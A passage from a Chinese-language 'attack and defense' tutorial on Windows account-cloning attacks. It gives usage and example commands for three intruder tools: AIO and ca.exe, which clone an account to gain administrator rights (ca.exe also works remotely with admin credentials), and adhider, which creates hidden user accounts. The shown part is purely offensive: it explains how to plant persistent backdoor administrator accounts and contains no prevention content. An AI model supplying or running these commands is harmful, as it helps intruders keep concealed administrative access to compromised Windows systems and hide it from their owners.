黑客攻防实战：Windows系统克隆攻击与防范

核心提示： 4.使用AIO克隆AIO(All In One)是WinEggDrop写的一个把很多小工具功能集成一体的一个“工具”，其中有克隆用户、修改服务的启动类型、删除系统账户、检查系统隐藏服务、端口扫描和端口转发等等，黑客攻防实战：Windows系统克隆攻击与防范(5)，使

4.使用AIO克隆

AIO(All In One)是WinEggDrop写的一个把很多小工具功能集成一体的一个“工具”，其中有克隆用户、修改服务的启动类型、删除系统账户、检查系统隐藏服务、端口扫描和端口转发等等。

使用AIO克隆很简单，就是: Aio.exe -Clone 正常账号 要被克隆账户 密码

如: Aio.exe -Clone Administrator IUSR_XODU5PTT910NHOO n3tl04d

这样就可以用IUSR_XODU5PTT910NHOOn3tl04d作为管理员登录了。

如图9所示。

图9

5.使用CA克隆

ca.exe 小榕编写的一个远程克隆账号工具，当然本地克隆也没问题。

用法如下：ca ip地址 管理员用户名 管理员密码 克隆的用户 密码

如：ca 127.0.0.1 administrator 123456 IUSR_XODU5PTT910NHOO 123456

如图10所示。

图10

6.建立隐藏账号

需要使用的工具叫adhider，是锦毛鼠写的一个专门建立隐藏用户的工具。此工具有个缺点，那就是当服务器重启后，用户就隐藏不了，会在用户管理中显示出来。

用法如下：adhider 用户名 密码

如：adhider n3tl04d$123456

如图11所示。

图11